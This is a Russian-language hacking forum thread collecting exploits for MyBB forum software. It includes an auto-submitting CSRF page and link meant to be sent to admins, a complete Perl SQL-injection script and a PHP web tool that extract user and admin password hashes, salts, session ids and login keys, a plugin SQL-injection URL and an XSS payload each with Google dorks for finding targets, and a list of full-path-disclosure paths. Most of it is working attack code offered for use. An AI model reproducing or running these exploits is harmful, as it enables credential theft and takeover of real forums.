Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
22.01.2008, 17:24
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
Delete PM's XSRF Vuln
MyBB 1.2.11
################################################## ##
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
################################################## ##
####1) Delete Threads XSRF Vulnerabilitie:
<html>
<head>
</head>
<body onLoad="javascript:document.formular.submit()">
<form action="http://localhost/xampp/mybb/moderation.php" method="post"
name="formular">
<input type="hidden" name="action" value="do_multideletethreads" />
<input type="hidden" name="fid" value="2" /> <!-- forumid -->
<input type="hidden" name="threads" value="15|14" /> <!-- threadids -->
<input type="submit" value="Delete Threads" />
</form>
</body>
</html>
###Poc:
1. Create a .html file and copy the code into it.
2. Upload the file and now send the link to an admin or moderator
3. Done
####2) Delete PM's XSRF Vuln:
This one is only doing via GET and no question:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
###Poc: (An easy way):
1. Send to a user this link:
http://localhost/xampp/mybb/private.php?action=delete&pmid=3
2. Done
Последний раз редактировалось Elekt; 03.09.2008 в 03:18..
|
|
|
mybb1.2.11 [disablesmilies] Remote SQL-injection Exploit |
26.01.2008, 19:29
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
mybb1.2.11 [disablesmilies] Remote SQL-injection Exploit
MyBB <= 1.2.11 [disablesmilies] Remote SQL-injection Exploit
Author: Janek Vind, [waraxe-2008-SA#064], 21. January 2008, Estonia, Tartu, http://www.waraxe.us/advisory-64.html
Авторизуйтесь на форуме чтоб получить валидную куку в браузер, после чего впишите в поля свой ID и ник.
За одно нажатие вы отправите самому себе два сообщения, одно формальное, а второе - с логином и паролем админа.
Если в таблице сессий есть валидная сессия - можете получить её оттуда и поадминить форумом без пасса.
Напоминаю, что привязка по айпи обходилась раньше через CLIENT-IP.
[ i ] Password algoritm : md5(md5($salt).md5($password))
|
|
|
|
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit |
06.02.2008, 19:01
|
|
Banned
Регистрация: 04.01.2007
Сообщений: 193
Провел на форуме:
4213286
Репутация:
728
|
|
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit
Код:
#!/usr/bin/perl
#
# MyBB <=1.2.11 SQL Injection Exploit based on http://www.waraxe.us/advisory-64.html
#
# Needs MySQL >=4.1 and a valid registration.
#
# By F
#
use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use HTML::Entities;
####
print("\n");
print("############################################################################\n");
print("# MyBB <=1.2.11 SQL Injection Exploit by F #\n");
print("############################################################################\n");
if(@ARGV<5){
print("# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] #\n");
print("############################################################################\n");
exit;
};
$host="http://".$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$pass=$ARGV[3];
$vid1=$ARGV[4];
if(@ARGV<=5){
$vidn=$vid1;
}else{
$vidn=$ARGV[5];
};
print("\n");
print(" [~] Host: ".$host."\n");
print(" [~] Path: ".$path."\n");
print(" [~] User: ".$user."\n");
print(" [~] Pass: ".$pass."\n");
print(" [~] From #".$vid1."\n");
print(" [~] To #".$vidn."\n");
print("\n");
####
# create $browser and $cookie_jar
$browser=LWP::UserAgent->new() or die(" [-] Cannot create new UserAgent\n");
$cookie_jar=HTTP::Cookies->new();
$browser->cookie_jar($cookie_jar);
# try to log in
$result=$browser->post(
$host.$path."member.php",
Content=>[
"action"=>"do_login",
"username"=>$user,
"password"=>$pass,
"url"=>$host.$path."index.php",
"submit"=>"Login",
],
);
# check cookie
if($cookie_jar->as_string=~m/mybbuser=.*?;/){
print(" [+] Login successful\n");
}else{
print(" [-] Login unsuccessful\n");
exit;
};
# try to get uid
$result=$browser->get($host.$path."usercp.php");
# check result
if($result->as_string=~m/member\.php\?action=profile&uid=([0-9]*?)"/){
$uid=$1;
print(" [+] Getting uid successful: ".$uid."\n");
}else{
print(" [-] Getting uid unsuccessful\n");
exit;
};
# construct exploit
$exploit ="yes','0','0'),";
$exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_result','0',concat('(haxx_start)',";
for($vid=$vid1;$vid<=$vidn;$vid++){
$exploit.="ifnull((select concat(uid,'-',username,':',password,':',salt,'::',email,'-',usergroup,'-',additionalgroups,'-',website,'-',regip,'(haxx_delim)') from mybb_users where uid=".$vid."),''),";
};
$exploit.="'(haxx_end)'),'".time()."','0','no','yes','0','0'),";
$exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_message=0','0','nuthin0','".time()."','0','no','yes";
# try to send exploit
$result=$browser->post(
$host.$path."private.php",
Content=>[
"action"=>"do_send",
"subject"=>"haxx_message=".(1+rand(65536)),
"message"=>"nuthin".(1+rand(65536)),
"to"=>$user,
"options[disablesmilies]"=>$exploit,
],
);
# check if user is valid
if( ($result->as_string=~m/Your account has either been suspended or you have been banned from accessing this resource./) ||
($result->as_string=~m/You do not have permission to access this page./) ||
($result->as_string=~m/Your account may still be awaiting activation or moderation./)
){
print(" [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons.\n");
exit;
};
# check the 5 minute cap
if($result->as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes./){
print(" [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again.\n");
exit;
};
# check if it successfully sent the messages -> REMOVED, does not work on some installations
#if($result->as_string=~m/Thank you, your private message has successfully been sent./){
print(" [+] Sending messages was successful.\n");
#}else{
# print(" [-] Sending messages was unsuccessful.\n");
# print($result->as_string);
# exit;
#};
# delete auxiliary messages
print(" [+] Deleting auxiliary messages.\n");
$result=$browser->get($host.$path."private.php?fid=1");
while($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_message=[0-9]*?</g){
$pmid=$1;
$result=$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
$result=$browser->get($host.$path."private.php?fid=1");
};
# download and delete messages
print(" [+] Exploit successful.\n");
print("\n");
while($result->as_string=~m/private\.php\?action=read&pmid=([0-9]*?)">haxx_result</g){
$pmid=$1;
$result=$browser->get($host.$path."private.php?action=read&pmid=".$pmid);
if($result->as_string=~m/\(haxx_start\)(.*)\(haxx_end\)/){
$pm=$1;
$pm=~s/\(haxx_delim\)/\n/g;
$pm=decode_entities($pm);
print($pm);
};
$result=$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
$result=$browser->get($host.$path."private.php?fid=1");
};
# milw0rm.com
|
|
|
|
MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability |
06.04.2008, 21:29
|
|
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499
Репутация:
3702
|
|
MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability
MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability
Код:
###################################################################################
# #
# MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
# #
# found by: Lidloses_Auge #
# Contact (ICQ): 120946783 #
# Greetz to: free-hack.com #
# #
###############################################################################################################################################
# #
# Vulnerability: #
# #
# Document: pages.php #
# GET-Parameter: page #
# #
# Dork: #
# #
# inurl:"pages.php" + intext:"powered by mybb" #
# #
# Example: #
# #
# http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
# #
# Notes: #
# #
# Successrate depends on the permissions which could be set for viewing the 'page' #
# #
###############################################################################################################################################
# milw0rm.com [2008-04-06]
|
|
|
|
28.04.2008, 00:02
|
|
Новичок
Регистрация: 22.04.2008
Сообщений: 1
Провел на форуме:
26887
Репутация:
0
|
|
Ребят а как определить версию myBB?
Смотрел хтмл код, там конечно ничего нет. Пару раз видел, что у копирайта писали версию, но это единицы.
Прошу ответить на вопрос.
|
|
|
|
как определить версию myBB |
09.05.2008, 06:48
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
как определить версию myBB
Как определить версию myBB?..
/install/resources/settings.xml
Пример:
Код HTML:
<settings version="122" exported="1129013345">
/install/resources/mybb_theme.xml
Пример:
Код HTML:
<?xml version="1.0" encoding="UTF-8"?>
<theme name="MyBB Master Style" version="122">
|
|
|
|
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2 или 3) |
28.08.2008, 22:21
|
|
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279
Репутация:
2727
|
|
MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2 или 3)
http://milw0rm.com/exploits/6316
PHP код:
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
// exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
//
// POST http://mybb.ru/forum/private.php HTTP/1.1
// Host: mybb.ru
// Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
// Content-Type: application/x-www-form-urlencoded
// Content-Length: 479
// Connection: Close
//
// to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
//
// greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
// and http://expdb.cc/?op=expdb (welcome to our priv8 exploits shop, greetz to all it's members)*
// 25.01.08
error_reporting(0);
@ini_set("max_execution_time",0);
@ini_set('output_buffering',0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ob_implicit_flush(1);
header("Content-Type: text/html; charset=utf-8\r\n");
header("Pragma: no-cache");
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>mybb 1.2.11 xek</title>
<style>
<!--
A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
A:active {COLOR: #228B22; TEXT-DECORATION: none}
A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
BODY
{
margin="5";
FONT-WEIGHT: normal;
COLOR: #B9B9BD;
BACKGROUND: #44474F;
FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif;
}
-->
</style>
</head>
<body>
<?php
function myflush($timee)
{
if(ob_get_contents())
{
ob_flush();
ob_clean();
flush();
usleep($timee);
}
}
if (!$_GET)
{
echo
'<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
<input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value=" get admin passwd... "><br><br>
<input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
<font color="#B9B9BD"> ¬ for expamle "expdb.cc"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
<font color="#B9B9BD"> ¬ patch 2 mybb forum, for expamle "community/mybb"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
<font color="#B9B9BD"> ¬ you username on this forum, for expamle "c411k"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
<font color="#B9B9BD"> ¬ you password, for expamle "h1world"<br>
<input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
<font color="#B9B9BD"> ¬ admin id, default 1<br>
</form>';
}
if (isset($_GET['fuck_mybb']))
{
$username = ($_POST['username']);
$pwd = ($_POST['pwd']);
$host_mybb = ($_POST['hostname']);
$patch_mybb = ($_POST['patch']);
$uid_needed = ($_POST['uid_needed']);
$login_mybb = 'member.php';
$pm_mybb = 'private.php';
$data_login = 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';
function sendd($host, $patch, $scr_nm, $method, $data_gp, $cook1e)
{
global $send_http;
$s = array();
$url = fsockopen($host, 80);
$send_http = "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
$send_http .= "Host: $host\r\n";
$send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
$send_http .= "Cookie: $cook1e\r\n";
$send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
$send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
$send_http .= "Connection: Close\r\n\r\n";
if ($method === 'POST')
{
$send_http .= $data_gp;
}
//print_r($send_http);
fputs($url, $send_http);
while (!feof($url)) $s[] = fgets($url, 1028);
fclose($url);
return $s;
}
echo '<pre>- start....';
myflush(50000);
$get_cookie = sendd($host_mybb, $patch_mybb, $login_mybb, 'POST', $data_login, 'fuckkk');
echo '<pre>- login '.$username.' with passwd = '.$pwd.' done';
myflush(50000);
foreach ($get_cookie as $value)
{
if (strpos($value, 'Set-Cookie: mybbuser=') !== false)
{
$value = explode(";", $value);
$cookie = strstr($value[0], 'mybbuser');
break;
}
}
echo '<pre>- cookie: '.$cookie;
myflush(50000);
preg_match("/mybbuser=(.*)_/", $cookie, $m);
$get_uid = $m[1];
echo '<pre>- user id: '.$get_uid;
myflush(50000);
$data_expl = "to=$username&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),($get_uid,$get_uid,$get_uid,1,'with+<3+from+antichat.ru',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=$uid_needed),(select+password+from+mybb_users+where+uid=$uid_needed),(select+salt+from+mybb_users+where+uid=$uid_needed),' admin sid',(select+sid+from+mybb_adminsessions+where+uid=$uid_needed),' admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=$uid_needed)),1121512515,null,null,'yes',null,null)/*&action=do_send";
sendd($host_mybb, $patch_mybb, $pm_mybb, 'POST', $data_expl, $cookie);
echo '<pre>- send exploit:
-------------------
'.$send_http.'
-------------------
look you private messages 4 admin passwd hash <a href=http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.' target=_blank>http://'.$host_mybb.'/'.$patch_mybb.'/'.$pm_mybb.'</a>';
}
?>
</body>
</html>
|
|
|
|
13.01.2009, 13:07
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Full path disclosure MyBB 1.4.x
Код:
/admin/modules/config/smilies.php
/inc/class_custommoderation.php
/inc/3rdparty/diff/Diff3.php
/inc/3rdparty/diff/Diff/Renderer/inline.php
/inc/3rdparty/diff/Diff/Renderer/unified.php
/inc/tasks/massmail.php
__________________
в строю
|
|
|
|
23.02.2009, 22:14
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747
Репутация:
5170
|
|
MyBB (FWS Mod) reflected XSS
Mod Name: Forum Warning System (http://community.mybboard.net/attachment.php?aid=6814)
Vulnerable piece of code:
Код:
//USERCP AND PM CHANGES
elseif($file == "usercp.php" || $file == "private.php")
{
if(function_exists("imagecreatefrompng") && $mybb->user['fws_warnings'] != 0)
{
if($mybb->user['fws_warnings'] <= 14 && $mybb->user['fws_warnings'] > 0) $addition = " ".fws_warning_colour($mybb->user['fws_warnings'].
"%");
$fws_current_w_level = '<img src="fws.php?action=image&wl='.$mybb-
>user['fws_warnings'].'" alt="'.$mybb->user['fws_warnings'].'%" title="'.$mybb->user['fws_warnings'].'%" border="0" />'.$addition;
}
Example: http://mybboard.it/forum/fws.php?action=image&wl=/\<sCRIPT>alert("xss")</sCRIPT>\
Google dork: inurl:fws.php; "MyBB" inurl:fws.php
http://securityvulns.ru/Vdocument379.html |
|
|
|
18.05.2009, 01:58
|
|
Новичок
Регистрация: 02.05.2009
Сообщений: 18
Провел на форуме:
31604
Репутация:
-3
|
|
xss
Последний раз редактировалось SEKTOR3A; 18.05.2009 в 02:18..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [iq]](/avatars/avatar54755.gif){kind=avatar}
Похожие темы
Линейный вид
